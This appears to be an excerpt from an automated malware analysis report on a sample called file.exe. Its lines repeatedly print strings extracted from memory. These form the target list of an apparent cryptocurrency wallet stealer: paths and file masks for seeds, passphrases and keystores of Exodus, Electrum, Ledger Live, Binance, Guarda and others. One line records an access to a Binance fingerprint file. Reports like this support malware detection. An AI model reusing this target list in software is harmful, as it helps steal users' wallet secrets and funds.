                      Source: file.exe, 00000000.00000002.2588317062.0000000000D07000.00000040.00000001.01000000.00000003.sdmpString found in binary or memory: 1|\Blockstream\Green\wallets\|*.*|1|Wasabi Wallet|1|\WalletWasabi\Client\Wallets\|*.json|0|Ethereum|1|\Ethereum\|keystore|0|Electrum|1|\Electrum\wallets\|*.*|0|ElectrumLTC|1|\Electrum-LTC\wallets\|*.*|0|Exodus|1|\Exodus\|exodus.conf.json|0|Exodus|1|\Exodus\|window-state.json|0|Exodus\exodus.wallet|1|\Exodus\exodus.wallet\|passphrase.json|0|Exodus\exodus.wallet|1|\Exodus\exodus.wallet\|seed.seco|0|Exodus\exodus.wallet|1|\Exodus\exodus.wallet\|info.seco|0|Electron Cash|1|\ElectronCash\wallets\|*.*|0|MultiDoge|1|\MultiDoge\|multidoge.wallet|0|Jaxx Desktop (old)|1|\jaxx\Local Storage\|file__0.localstorage|0|Jaxx Desktop|1|\com.liberty.jaxx\IndexedDB\file__0.indexeddb.leveldb\|*.*|0|Atomic|1|\atomic\Local Storage\leveldb\|*.*|0|Binance|1|\Binance\|app-store.json|0|Binance|1|\Binance\|simple-storage.json|0|Binance|1|\Binance\|.finger-print.fp|0|Coinomi|1|\Coinomi\Coinomi\wallets\|*.wallet|1|Coinomi|1|\Coinomi\Coinomi\wallets\|*.config|1|Ledger Live\Local Storage\leveldb|1|\Ledger Live\Local Storage\leveldb\|*.*|0|Ledger Live|1|\Ledger Live\|*.*|0|Ledger Live\Session Storage|1|\Ledger Live\Session Storage\|*.*|0|Chia Wallet\config|2|\.chia\mainnet\config\|*.*|0|Chia Wallet\run|2|\.chia\mainnet\run\|*.*|0|Chia Wallet\wallet|2|\.chia\mainnet\wallet\|*.*|0|Komodo Wallet\config|1|\atomic_qt\config\|*.*|0|Komodo Wallet\exports|1|\atomic_qt\exports\|*.*|0|Guarda Desktop\IndexedDB\https_guarda.co_0.indexeddb.leveldb|1|\Guarda\IndexedDB\https_guarda.co_0.indexeddb.leveldb\|*.*|0|Guarda Desktop\Local Storage\leveldb|1|\Guarda\Local Storage\leveldb\|*.*|0|
                      Source: file.exe, 00000000.00000002.2588317062.0000000000D07000.00000040.00000001.01000000.00000003.sdmpString found in binary or memory: 1|\Blockstream\Green\wallets\|*.*|1|Wasabi Wallet|1|\WalletWasabi\Client\Wallets\|*.json|0|Ethereum|1|\Ethereum\|keystore|0|Electrum|1|\Electrum\wallets\|*.*|0|ElectrumLTC|1|\Electrum-LTC\wallets\|*.*|0|Exodus|1|\Exodus\|exodus.conf.json|0|Exodus|1|\Exodus\|window-state.json|0|Exodus\exodus.wallet|1|\Exodus\exodus.wallet\|passphrase.json|0|Exodus\exodus.wallet|1|\Exodus\exodus.wallet\|seed.seco|0|Exodus\exodus.wallet|1|\Exodus\exodus.wallet\|info.seco|0|Electron Cash|1|\ElectronCash\wallets\|*.*|0|MultiDoge|1|\MultiDoge\|multidoge.wallet|0|Jaxx Desktop (old)|1|\jaxx\Local Storage\|file__0.localstorage|0|Jaxx Desktop|1|\com.liberty.jaxx\IndexedDB\file__0.indexeddb.leveldb\|*.*|0|Atomic|1|\atomic\Local Storage\leveldb\|*.*|0|Binance|1|\Binance\|app-store.json|0|Binance|1|\Binance\|simple-storage.json|0|Binance|1|\Binance\|.finger-print.fp|0|Coinomi|1|\Coinomi\Coinomi\wallets\|*.wallet|1|Coinomi|1|\Coinomi\Coinomi\wallets\|*.config|1|Ledger Live\Local Storage\leveldb|1|\Ledger Live\Local Storage\leveldb\|*.*|0|Ledger Live|1|\Ledger Live\|*.*|0|Ledger Live\Session Storage|1|\Ledger Live\Session Storage\|*.*|0|Chia Wallet\config|2|\.chia\mainnet\config\|*.*|0|Chia Wallet\run|2|\.chia\mainnet\run\|*.*|0|Chia Wallet\wallet|2|\.chia\mainnet\wallet\|*.*|0|Komodo Wallet\config|1|\atomic_qt\config\|*.*|0|Komodo Wallet\exports|1|\atomic_qt\exports\|*.*|0|Guarda Desktop\IndexedDB\https_guarda.co_0.indexeddb.leveldb|1|\Guarda\IndexedDB\https_guarda.co_0.indexeddb.leveldb\|*.*|0|Guarda Desktop\Local Storage\leveldb|1|\Guarda\Local Storage\leveldb\|*.*|0|
                      Source: file.exe, 00000000.00000002.2588317062.0000000000D07000.00000040.00000001.01000000.00000003.sdmpString found in binary or memory: 1|\Blockstream\Green\wallets\|*.*|1|Wasabi Wallet|1|\WalletWasabi\Client\Wallets\|*.json|0|Ethereum|1|\Ethereum\|keystore|0|Electrum|1|\Electrum\wallets\|*.*|0|ElectrumLTC|1|\Electrum-LTC\wallets\|*.*|0|Exodus|1|\Exodus\|exodus.conf.json|0|Exodus|1|\Exodus\|window-state.json|0|Exodus\exodus.wallet|1|\Exodus\exodus.wallet\|passphrase.json|0|Exodus\exodus.wallet|1|\Exodus\exodus.wallet\|seed.seco|0|Exodus\exodus.wallet|1|\Exodus\exodus.wallet\|info.seco|0|Electron Cash|1|\ElectronCash\wallets\|*.*|0|MultiDoge|1|\MultiDoge\|multidoge.wallet|0|Jaxx Desktop (old)|1|\jaxx\Local Storage\|file__0.localstorage|0|Jaxx Desktop|1|\com.liberty.jaxx\IndexedDB\file__0.indexeddb.leveldb\|*.*|0|Atomic|1|\atomic\Local Storage\leveldb\|*.*|0|Binance|1|\Binance\|app-store.json|0|Binance|1|\Binance\|simple-storage.json|0|Binance|1|\Binance\|.finger-print.fp|0|Coinomi|1|\Coinomi\Coinomi\wallets\|*.wallet|1|Coinomi|1|\Coinomi\Coinomi\wallets\|*.config|1|Ledger Live\Local Storage\leveldb|1|\Ledger Live\Local Storage\leveldb\|*.*|0|Ledger Live|1|\Ledger Live\|*.*|0|Ledger Live\Session Storage|1|\Ledger Live\Session Storage\|*.*|0|Chia Wallet\config|2|\.chia\mainnet\config\|*.*|0|Chia Wallet\run|2|\.chia\mainnet\run\|*.*|0|Chia Wallet\wallet|2|\.chia\mainnet\wallet\|*.*|0|Komodo Wallet\config|1|\atomic_qt\config\|*.*|0|Komodo Wallet\exports|1|\atomic_qt\exports\|*.*|0|Guarda Desktop\IndexedDB\https_guarda.co_0.indexeddb.leveldb|1|\Guarda\IndexedDB\https_guarda.co_0.indexeddb.leveldb\|*.*|0|Guarda Desktop\Local Storage\leveldb|1|\Guarda\Local Storage\leveldb\|*.*|0|
                      Source: file.exe, 00000000.00000002.2588317062.0000000000D07000.00000040.00000001.01000000.00000003.sdmpString found in binary or memory: 1|\Blockstream\Green\wallets\|*.*|1|Wasabi Wallet|1|\WalletWasabi\Client\Wallets\|*.json|0|Ethereum|1|\Ethereum\|keystore|0|Electrum|1|\Electrum\wallets\|*.*|0|ElectrumLTC|1|\Electrum-LTC\wallets\|*.*|0|Exodus|1|\Exodus\|exodus.conf.json|0|Exodus|1|\Exodus\|window-state.json|0|Exodus\exodus.wallet|1|\Exodus\exodus.wallet\|passphrase.json|0|Exodus\exodus.wallet|1|\Exodus\exodus.wallet\|seed.seco|0|Exodus\exodus.wallet|1|\Exodus\exodus.wallet\|info.seco|0|Electron Cash|1|\ElectronCash\wallets\|*.*|0|MultiDoge|1|\MultiDoge\|multidoge.wallet|0|Jaxx Desktop (old)|1|\jaxx\Local Storage\|file__0.localstorage|0|Jaxx Desktop|1|\com.liberty.jaxx\IndexedDB\file__0.indexeddb.leveldb\|*.*|0|Atomic|1|\atomic\Local Storage\leveldb\|*.*|0|Binance|1|\Binance\|app-store.json|0|Binance|1|\Binance\|simple-storage.json|0|Binance|1|\Binance\|.finger-print.fp|0|Coinomi|1|\Coinomi\Coinomi\wallets\|*.wallet|1|Coinomi|1|\Coinomi\Coinomi\wallets\|*.config|1|Ledger Live\Local Storage\leveldb|1|\Ledger Live\Local Storage\leveldb\|*.*|0|Ledger Live|1|\Ledger Live\|*.*|0|Ledger Live\Session Storage|1|\Ledger Live\Session Storage\|*.*|0|Chia Wallet\config|2|\.chia\mainnet\config\|*.*|0|Chia Wallet\run|2|\.chia\mainnet\run\|*.*|0|Chia Wallet\wallet|2|\.chia\mainnet\wallet\|*.*|0|Komodo Wallet\config|1|\atomic_qt\config\|*.*|0|Komodo Wallet\exports|1|\atomic_qt\exports\|*.*|0|Guarda Desktop\IndexedDB\https_guarda.co_0.indexeddb.leveldb|1|\Guarda\IndexedDB\https_guarda.co_0.indexeddb.leveldb\|*.*|0|Guarda Desktop\Local Storage\leveldb|1|\Guarda\Local Storage\leveldb\|*.*|0|
                      Source: file.exe, 00000000.00000002.2588317062.0000000000D07000.00000040.00000001.01000000.00000003.sdmpString found in binary or memory: 1|\Blockstream\Green\wallets\|*.*|1|Wasabi Wallet|1|\WalletWasabi\Client\Wallets\|*.json|0|Ethereum|1|\Ethereum\|keystore|0|Electrum|1|\Electrum\wallets\|*.*|0|ElectrumLTC|1|\Electrum-LTC\wallets\|*.*|0|Exodus|1|\Exodus\|exodus.conf.json|0|Exodus|1|\Exodus\|window-state.json|0|Exodus\exodus.wallet|1|\Exodus\exodus.wallet\|passphrase.json|0|Exodus\exodus.wallet|1|\Exodus\exodus.wallet\|seed.seco|0|Exodus\exodus.wallet|1|\Exodus\exodus.wallet\|info.seco|0|Electron Cash|1|\ElectronCash\wallets\|*.*|0|MultiDoge|1|\MultiDoge\|multidoge.wallet|0|Jaxx Desktop (old)|1|\jaxx\Local Storage\|file__0.localstorage|0|Jaxx Desktop|1|\com.liberty.jaxx\IndexedDB\file__0.indexeddb.leveldb\|*.*|0|Atomic|1|\atomic\Local Storage\leveldb\|*.*|0|Binance|1|\Binance\|app-store.json|0|Binance|1|\Binance\|simple-storage.json|0|Binance|1|\Binance\|.finger-print.fp|0|Coinomi|1|\Coinomi\Coinomi\wallets\|*.wallet|1|Coinomi|1|\Coinomi\Coinomi\wallets\|*.config|1|Ledger Live\Local Storage\leveldb|1|\Ledger Live\Local Storage\leveldb\|*.*|0|Ledger Live|1|\Ledger Live\|*.*|0|Ledger Live\Session Storage|1|\Ledger Live\Session Storage\|*.*|0|Chia Wallet\config|2|\.chia\mainnet\config\|*.*|0|Chia Wallet\run|2|\.chia\mainnet\run\|*.*|0|Chia Wallet\wallet|2|\.chia\mainnet\wallet\|*.*|0|Komodo Wallet\config|1|\atomic_qt\config\|*.*|0|Komodo Wallet\exports|1|\atomic_qt\exports\|*.*|0|Guarda Desktop\IndexedDB\https_guarda.co_0.indexeddb.leveldb|1|\Guarda\IndexedDB\https_guarda.co_0.indexeddb.leveldb\|*.*|0|Guarda Desktop\Local Storage\leveldb|1|\Guarda\Local Storage\leveldb\|*.*|0|
                      Source: file.exe, 00000000.00000002.2588317062.0000000000D07000.00000040.00000001.01000000.00000003.sdmpString found in binary or memory: 1|\Blockstream\Green\wallets\|*.*|1|Wasabi Wallet|1|\WalletWasabi\Client\Wallets\|*.json|0|Ethereum|1|\Ethereum\|keystore|0|Electrum|1|\Electrum\wallets\|*.*|0|ElectrumLTC|1|\Electrum-LTC\wallets\|*.*|0|Exodus|1|\Exodus\|exodus.conf.json|0|Exodus|1|\Exodus\|window-state.json|0|Exodus\exodus.wallet|1|\Exodus\exodus.wallet\|passphrase.json|0|Exodus\exodus.wallet|1|\Exodus\exodus.wallet\|seed.seco|0|Exodus\exodus.wallet|1|\Exodus\exodus.wallet\|info.seco|0|Electron Cash|1|\ElectronCash\wallets\|*.*|0|MultiDoge|1|\MultiDoge\|multidoge.wallet|0|Jaxx Desktop (old)|1|\jaxx\Local Storage\|file__0.localstorage|0|Jaxx Desktop|1|\com.liberty.jaxx\IndexedDB\file__0.indexeddb.leveldb\|*.*|0|Atomic|1|\atomic\Local Storage\leveldb\|*.*|0|Binance|1|\Binance\|app-store.json|0|Binance|1|\Binance\|simple-storage.json|0|Binance|1|\Binance\|.finger-print.fp|0|Coinomi|1|\Coinomi\Coinomi\wallets\|*.wallet|1|Coinomi|1|\Coinomi\Coinomi\wallets\|*.config|1|Ledger Live\Local Storage\leveldb|1|\Ledger Live\Local Storage\leveldb\|*.*|0|Ledger Live|1|\Ledger Live\|*.*|0|Ledger Live\Session Storage|1|\Ledger Live\Session Storage\|*.*|0|Chia Wallet\config|2|\.chia\mainnet\config\|*.*|0|Chia Wallet\run|2|\.chia\mainnet\run\|*.*|0|Chia Wallet\wallet|2|\.chia\mainnet\wallet\|*.*|0|Komodo Wallet\config|1|\atomic_qt\config\|*.*|0|Komodo Wallet\exports|1|\atomic_qt\exports\|*.*|0|Guarda Desktop\IndexedDB\https_guarda.co_0.indexeddb.leveldb|1|\Guarda\IndexedDB\https_guarda.co_0.indexeddb.leveldb\|*.*|0|Guarda Desktop\Local Storage\leveldb|1|\Guarda\Local Storage\leveldb\|*.*|0|
                      Source: file.exe, 00000000.00000002.2588317062.0000000000D07000.00000040.00000001.01000000.00000003.sdmpString found in binary or memory: 1|\Blockstream\Green\wallets\|*.*|1|Wasabi Wallet|1|\WalletWasabi\Client\Wallets\|*.json|0|Ethereum|1|\Ethereum\|keystore|0|Electrum|1|\Electrum\wallets\|*.*|0|ElectrumLTC|1|\Electrum-LTC\wallets\|*.*|0|Exodus|1|\Exodus\|exodus.conf.json|0|Exodus|1|\Exodus\|window-state.json|0|Exodus\exodus.wallet|1|\Exodus\exodus.wallet\|passphrase.json|0|Exodus\exodus.wallet|1|\Exodus\exodus.wallet\|seed.seco|0|Exodus\exodus.wallet|1|\Exodus\exodus.wallet\|info.seco|0|Electron Cash|1|\ElectronCash\wallets\|*.*|0|MultiDoge|1|\MultiDoge\|multidoge.wallet|0|Jaxx Desktop (old)|1|\jaxx\Local Storage\|file__0.localstorage|0|Jaxx Desktop|1|\com.liberty.jaxx\IndexedDB\file__0.indexeddb.leveldb\|*.*|0|Atomic|1|\atomic\Local Storage\leveldb\|*.*|0|Binance|1|\Binance\|app-store.json|0|Binance|1|\Binance\|simple-storage.json|0|Binance|1|\Binance\|.finger-print.fp|0|Coinomi|1|\Coinomi\Coinomi\wallets\|*.wallet|1|Coinomi|1|\Coinomi\Coinomi\wallets\|*.config|1|Ledger Live\Local Storage\leveldb|1|\Ledger Live\Local Storage\leveldb\|*.*|0|Ledger Live|1|\Ledger Live\|*.*|0|Ledger Live\Session Storage|1|\Ledger Live\Session Storage\|*.*|0|Chia Wallet\config|2|\.chia\mainnet\config\|*.*|0|Chia Wallet\run|2|\.chia\mainnet\run\|*.*|0|Chia Wallet\wallet|2|\.chia\mainnet\wallet\|*.*|0|Komodo Wallet\config|1|\atomic_qt\config\|*.*|0|Komodo Wallet\exports|1|\atomic_qt\exports\|*.*|0|Guarda Desktop\IndexedDB\https_guarda.co_0.indexeddb.leveldb|1|\Guarda\IndexedDB\https_guarda.co_0.indexeddb.leveldb\|*.*|0|Guarda Desktop\Local Storage\leveldb|1|\Guarda\Local Storage\leveldb\|*.*|0|
                      Source: file.exe, 00000000.00000002.2588317062.0000000000D07000.00000040.00000001.01000000.00000003.sdmpString found in binary or memory: 1|\Blockstream\Green\wallets\|*.*|1|Wasabi Wallet|1|\WalletWasabi\Client\Wallets\|*.json|0|Ethereum|1|\Ethereum\|keystore|0|Electrum|1|\Electrum\wallets\|*.*|0|ElectrumLTC|1|\Electrum-LTC\wallets\|*.*|0|Exodus|1|\Exodus\|exodus.conf.json|0|Exodus|1|\Exodus\|window-state.json|0|Exodus\exodus.wallet|1|\Exodus\exodus.wallet\|passphrase.json|0|Exodus\exodus.wallet|1|\Exodus\exodus.wallet\|seed.seco|0|Exodus\exodus.wallet|1|\Exodus\exodus.wallet\|info.seco|0|Electron Cash|1|\ElectronCash\wallets\|*.*|0|MultiDoge|1|\MultiDoge\|multidoge.wallet|0|Jaxx Desktop (old)|1|\jaxx\Local Storage\|file__0.localstorage|0|Jaxx Desktop|1|\com.liberty.jaxx\IndexedDB\file__0.indexeddb.leveldb\|*.*|0|Atomic|1|\atomic\Local Storage\leveldb\|*.*|0|Binance|1|\Binance\|app-store.json|0|Binance|1|\Binance\|simple-storage.json|0|Binance|1|\Binance\|.finger-print.fp|0|Coinomi|1|\Coinomi\Coinomi\wallets\|*.wallet|1|Coinomi|1|\Coinomi\Coinomi\wallets\|*.config|1|Ledger Live\Local Storage\leveldb|1|\Ledger Live\Local Storage\leveldb\|*.*|0|Ledger Live|1|\Ledger Live\|*.*|0|Ledger Live\Session Storage|1|\Ledger Live\Session Storage\|*.*|0|Chia Wallet\config|2|\.chia\mainnet\config\|*.*|0|Chia Wallet\run|2|\.chia\mainnet\run\|*.*|0|Chia Wallet\wallet|2|\.chia\mainnet\wallet\|*.*|0|Komodo Wallet\config|1|\atomic_qt\config\|*.*|0|Komodo Wallet\exports|1|\atomic_qt\exports\|*.*|0|Guarda Desktop\IndexedDB\https_guarda.co_0.indexeddb.leveldb|1|\Guarda\IndexedDB\https_guarda.co_0.indexeddb.leveldb\|*.*|0|Guarda Desktop\Local Storage\leveldb|1|\Guarda\Local Storage\leveldb\|*.*|0|
                      Source: file.exe, 00000000.00000002.2588317062.0000000000D07000.00000040.00000001.01000000.00000003.sdmpString found in binary or memory: 1|\Blockstream\Green\wallets\|*.*|1|Wasabi Wallet|1|\WalletWasabi\Client\Wallets\|*.json|0|Ethereum|1|\Ethereum\|keystore|0|Electrum|1|\Electrum\wallets\|*.*|0|ElectrumLTC|1|\Electrum-LTC\wallets\|*.*|0|Exodus|1|\Exodus\|exodus.conf.json|0|Exodus|1|\Exodus\|window-state.json|0|Exodus\exodus.wallet|1|\Exodus\exodus.wallet\|passphrase.json|0|Exodus\exodus.wallet|1|\Exodus\exodus.wallet\|seed.seco|0|Exodus\exodus.wallet|1|\Exodus\exodus.wallet\|info.seco|0|Electron Cash|1|\ElectronCash\wallets\|*.*|0|MultiDoge|1|\MultiDoge\|multidoge.wallet|0|Jaxx Desktop (old)|1|\jaxx\Local Storage\|file__0.localstorage|0|Jaxx Desktop|1|\com.liberty.jaxx\IndexedDB\file__0.indexeddb.leveldb\|*.*|0|Atomic|1|\atomic\Local Storage\leveldb\|*.*|0|Binance|1|\Binance\|app-store.json|0|Binance|1|\Binance\|simple-storage.json|0|Binance|1|\Binance\|.finger-print.fp|0|Coinomi|1|\Coinomi\Coinomi\wallets\|*.wallet|1|Coinomi|1|\Coinomi\Coinomi\wallets\|*.config|1|Ledger Live\Local Storage\leveldb|1|\Ledger Live\Local Storage\leveldb\|*.*|0|Ledger Live|1|\Ledger Live\|*.*|0|Ledger Live\Session Storage|1|\Ledger Live\Session Storage\|*.*|0|Chia Wallet\config|2|\.chia\mainnet\config\|*.*|0|Chia Wallet\run|2|\.chia\mainnet\run\|*.*|0|Chia Wallet\wallet|2|\.chia\mainnet\wallet\|*.*|0|Komodo Wallet\config|1|\atomic_qt\config\|*.*|0|Komodo Wallet\exports|1|\atomic_qt\exports\|*.*|0|Guarda Desktop\IndexedDB\https_guarda.co_0.indexeddb.leveldb|1|\Guarda\IndexedDB\https_guarda.co_0.indexeddb.leveldb\|*.*|0|Guarda Desktop\Local Storage\leveldb|1|\Guarda\Local Storage\leveldb\|*.*|0|
                      Source: file.exe, 00000000.00000002.2588317062.0000000000D07000.00000040.00000001.01000000.00000003.sdmpString found in binary or memory: 1|\Blockstream\Green\wallets\|*.*|1|Wasabi Wallet|1|\WalletWasabi\Client\Wallets\|*.json|0|Ethereum|1|\Ethereum\|keystore|0|Electrum|1|\Electrum\wallets\|*.*|0|ElectrumLTC|1|\Electrum-LTC\wallets\|*.*|0|Exodus|1|\Exodus\|exodus.conf.json|0|Exodus|1|\Exodus\|window-state.json|0|Exodus\exodus.wallet|1|\Exodus\exodus.wallet\|passphrase.json|0|Exodus\exodus.wallet|1|\Exodus\exodus.wallet\|seed.seco|0|Exodus\exodus.wallet|1|\Exodus\exodus.wallet\|info.seco|0|Electron Cash|1|\ElectronCash\wallets\|*.*|0|MultiDoge|1|\MultiDoge\|multidoge.wallet|0|Jaxx Desktop (old)|1|\jaxx\Local Storage\|file__0.localstorage|0|Jaxx Desktop|1|\com.liberty.jaxx\IndexedDB\file__0.indexeddb.leveldb\|*.*|0|Atomic|1|\atomic\Local Storage\leveldb\|*.*|0|Binance|1|\Binance\|app-store.json|0|Binance|1|\Binance\|simple-storage.json|0|Binance|1|\Binance\|.finger-print.fp|0|Coinomi|1|\Coinomi\Coinomi\wallets\|*.wallet|1|Coinomi|1|\Coinomi\Coinomi\wallets\|*.config|1|Ledger Live\Local Storage\leveldb|1|\Ledger Live\Local Storage\leveldb\|*.*|0|Ledger Live|1|\Ledger Live\|*.*|0|Ledger Live\Session Storage|1|\Ledger Live\Session Storage\|*.*|0|Chia Wallet\config|2|\.chia\mainnet\config\|*.*|0|Chia Wallet\run|2|\.chia\mainnet\run\|*.*|0|Chia Wallet\wallet|2|\.chia\mainnet\wallet\|*.*|0|Komodo Wallet\config|1|\atomic_qt\config\|*.*|0|Komodo Wallet\exports|1|\atomic_qt\exports\|*.*|0|Guarda Desktop\IndexedDB\https_guarda.co_0.indexeddb.leveldb|1|\Guarda\IndexedDB\https_guarda.co_0.indexeddb.leveldb\|*.*|0|Guarda Desktop\Local Storage\leveldb|1|\Guarda\Local Storage\leveldb\|*.*|0|
                      Source: file.exe, 00000000.00000002.2588317062.0000000000D07000.00000040.00000001.01000000.00000003.sdmpString found in binary or memory: 1|\Blockstream\Green\wallets\|*.*|1|Wasabi Wallet|1|\WalletWasabi\Client\Wallets\|*.json|0|Ethereum|1|\Ethereum\|keystore|0|Electrum|1|\Electrum\wallets\|*.*|0|ElectrumLTC|1|\Electrum-LTC\wallets\|*.*|0|Exodus|1|\Exodus\|exodus.conf.json|0|Exodus|1|\Exodus\|window-state.json|0|Exodus\exodus.wallet|1|\Exodus\exodus.wallet\|passphrase.json|0|Exodus\exodus.wallet|1|\Exodus\exodus.wallet\|seed.seco|0|Exodus\exodus.wallet|1|\Exodus\exodus.wallet\|info.seco|0|Electron Cash|1|\ElectronCash\wallets\|*.*|0|MultiDoge|1|\MultiDoge\|multidoge.wallet|0|Jaxx Desktop (old)|1|\jaxx\Local Storage\|file__0.localstorage|0|Jaxx Desktop|1|\com.liberty.jaxx\IndexedDB\file__0.indexeddb.leveldb\|*.*|0|Atomic|1|\atomic\Local Storage\leveldb\|*.*|0|Binance|1|\Binance\|app-store.json|0|Binance|1|\Binance\|simple-storage.json|0|Binance|1|\Binance\|.finger-print.fp|0|Coinomi|1|\Coinomi\Coinomi\wallets\|*.wallet|1|Coinomi|1|\Coinomi\Coinomi\wallets\|*.config|1|Ledger Live\Local Storage\leveldb|1|\Ledger Live\Local Storage\leveldb\|*.*|0|Ledger Live|1|\Ledger Live\|*.*|0|Ledger Live\Session Storage|1|\Ledger Live\Session Storage\|*.*|0|Chia Wallet\config|2|\.chia\mainnet\config\|*.*|0|Chia Wallet\run|2|\.chia\mainnet\run\|*.*|0|Chia Wallet\wallet|2|\.chia\mainnet\wallet\|*.*|0|Komodo Wallet\config|1|\atomic_qt\config\|*.*|0|Komodo Wallet\exports|1|\atomic_qt\exports\|*.*|0|Guarda Desktop\IndexedDB\https_guarda.co_0.indexeddb.leveldb|1|\Guarda\IndexedDB\https_guarda.co_0.indexeddb.leveldb\|*.*|0|Guarda Desktop\Local Storage\leveldb|1|\Guarda\Local Storage\leveldb\|*.*|0|
                      Source: file.exe, 00000000.00000002.2588317062.0000000000D07000.00000040.00000001.01000000.00000003.sdmpString found in binary or memory: 1|\Blockstream\Green\wallets\|*.*|1|Wasabi Wallet|1|\WalletWasabi\Client\Wallets\|*.json|0|Ethereum|1|\Ethereum\|keystore|0|Electrum|1|\Electrum\wallets\|*.*|0|ElectrumLTC|1|\Electrum-LTC\wallets\|*.*|0|Exodus|1|\Exodus\|exodus.conf.json|0|Exodus|1|\Exodus\|window-state.json|0|Exodus\exodus.wallet|1|\Exodus\exodus.wallet\|passphrase.json|0|Exodus\exodus.wallet|1|\Exodus\exodus.wallet\|seed.seco|0|Exodus\exodus.wallet|1|\Exodus\exodus.wallet\|info.seco|0|Electron Cash|1|\ElectronCash\wallets\|*.*|0|MultiDoge|1|\MultiDoge\|multidoge.wallet|0|Jaxx Desktop (old)|1|\jaxx\Local Storage\|file__0.localstorage|0|Jaxx Desktop|1|\com.liberty.jaxx\IndexedDB\file__0.indexeddb.leveldb\|*.*|0|Atomic|1|\atomic\Local Storage\leveldb\|*.*|0|Binance|1|\Binance\|app-store.json|0|Binance|1|\Binance\|simple-storage.json|0|Binance|1|\Binance\|.finger-print.fp|0|Coinomi|1|\Coinomi\Coinomi\wallets\|*.wallet|1|Coinomi|1|\Coinomi\Coinomi\wallets\|*.config|1|Ledger Live\Local Storage\leveldb|1|\Ledger Live\Local Storage\leveldb\|*.*|0|Ledger Live|1|\Ledger Live\|*.*|0|Ledger Live\Session Storage|1|\Ledger Live\Session Storage\|*.*|0|Chia Wallet\config|2|\.chia\mainnet\config\|*.*|0|Chia Wallet\run|2|\.chia\mainnet\run\|*.*|0|Chia Wallet\wallet|2|\.chia\mainnet\wallet\|*.*|0|Komodo Wallet\config|1|\atomic_qt\config\|*.*|0|Komodo Wallet\exports|1|\atomic_qt\exports\|*.*|0|Guarda Desktop\IndexedDB\https_guarda.co_0.indexeddb.leveldb|1|\Guarda\IndexedDB\https_guarda.co_0.indexeddb.leveldb\|*.*|0|Guarda Desktop\Local Storage\leveldb|1|\Guarda\Local Storage\leveldb\|*.*|0|
                      Source: file.exe, 00000000.00000002.2588317062.0000000000D07000.00000040.00000001.01000000.00000003.sdmpString found in binary or memory: 1|\Blockstream\Green\wallets\|*.*|1|Wasabi Wallet|1|\WalletWasabi\Client\Wallets\|*.json|0|Ethereum|1|\Ethereum\|keystore|0|Electrum|1|\Electrum\wallets\|*.*|0|ElectrumLTC|1|\Electrum-LTC\wallets\|*.*|0|Exodus|1|\Exodus\|exodus.conf.json|0|Exodus|1|\Exodus\|window-state.json|0|Exodus\exodus.wallet|1|\Exodus\exodus.wallet\|passphrase.json|0|Exodus\exodus.wallet|1|\Exodus\exodus.wallet\|seed.seco|0|Exodus\exodus.wallet|1|\Exodus\exodus.wallet\|info.seco|0|Electron Cash|1|\ElectronCash\wallets\|*.*|0|MultiDoge|1|\MultiDoge\|multidoge.wallet|0|Jaxx Desktop (old)|1|\jaxx\Local Storage\|file__0.localstorage|0|Jaxx Desktop|1|\com.liberty.jaxx\IndexedDB\file__0.indexeddb.leveldb\|*.*|0|Atomic|1|\atomic\Local Storage\leveldb\|*.*|0|Binance|1|\Binance\|app-store.json|0|Binance|1|\Binance\|simple-storage.json|0|Binance|1|\Binance\|.finger-print.fp|0|Coinomi|1|\Coinomi\Coinomi\wallets\|*.wallet|1|Coinomi|1|\Coinomi\Coinomi\wallets\|*.config|1|Ledger Live\Local Storage\leveldb|1|\Ledger Live\Local Storage\leveldb\|*.*|0|Ledger Live|1|\Ledger Live\|*.*|0|Ledger Live\Session Storage|1|\Ledger Live\Session Storage\|*.*|0|Chia Wallet\config|2|\.chia\mainnet\config\|*.*|0|Chia Wallet\run|2|\.chia\mainnet\run\|*.*|0|Chia Wallet\wallet|2|\.chia\mainnet\wallet\|*.*|0|Komodo Wallet\config|1|\atomic_qt\config\|*.*|0|Komodo Wallet\exports|1|\atomic_qt\exports\|*.*|0|Guarda Desktop\IndexedDB\https_guarda.co_0.indexeddb.leveldb|1|\Guarda\IndexedDB\https_guarda.co_0.indexeddb.leveldb\|*.*|0|Guarda Desktop\Local Storage\leveldb|1|\Guarda\Local Storage\leveldb\|*.*|0|
                      Source: file.exe, 00000000.00000002.2589542776.0000000001885000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: 16.113Users\user\AppData\Roaming\Binance\.finger-print.fp
                      Source: file.exe, 00000000.00000002.2588317062.0000000000D07000.00000040.00000001.01000000.00000003.sdmpString found in binary or memory: 1|\Blockstream\Green\wallets\|*.*|1|Wasabi Wallet|1|\WalletWasabi\Client\Wallets\|*.json|0|Ethereum|1|\Ethereum\|keystore|0|Electrum|1|\Electrum\wallets\|*.*|0|ElectrumLTC|1|\Electrum-LTC\wallets\|*.*|0|Exodus|1|\Exodus\|exodus.conf.json|0|Exodus|1|\Exodus\|window-state.json|0|Exodus\exodus.wallet|1|\Exodus\exodus.wallet\|passphrase.json|0|Exodus\exodus.wallet|1|\Exodus\exodus.wallet\|seed.seco|0|Exodus\exodus.wallet|1|\Exodus\exodus.wallet\|info.seco|0|Electron Cash|1|\ElectronCash\wallets\|*.*|0|MultiDoge|1|\MultiDoge\|multidoge.wallet|0|Jaxx Desktop (old)|1|\jaxx\Local Storage\|file__0.localstorage|0|Jaxx Desktop|1|\com.liberty.jaxx\IndexedDB\file__0.indexeddb.leveldb\|*.*|0|Atomic|1|\atomic\Local Storage\leveldb\|*.*|0|Binance|1|\Binance\|app-store.json|0|Binance|1|\Binance\|simple-storage.json|0|Binance|1|\Binance\|.finger-print.fp|0|Coinomi|1|\Coinomi\Coinomi\wallets\|*.wallet|1|Coinomi|1|\Coinomi\Coinomi\wallets\|*.config|1|Ledger Live\Local Storage\leveldb|1|\Ledger Live\Local Storage\leveldb\|*.*|0|Ledger Live|1|\Ledger Live\|*.*|0|Ledger Live\Session Storage|1|\Ledger Live\Session Storage\|*.*|0|Chia Wallet\config|2|\.chia\mainnet\config\|*.*|0|Chia Wallet\run|2|\.chia\mainnet\run\|*.*|0|Chia Wallet\wallet|2|\.chia\mainnet\wallet\|*.*|0|Komodo Wallet\config|1|\atomic_qt\config\|*.*|0|Komodo Wallet\exports|1|\atomic_qt\exports\|*.*|0|Guarda Desktop\IndexedDB\https_guarda.co_0.indexeddb.leveldb|1|\Guarda\IndexedDB\https_guarda.co_0.indexeddb.leveldb\|*.*|0|Guarda Desktop\Local Storage\leveldb|1|\Guarda\Local Storage\leveldb\|*.*|0|
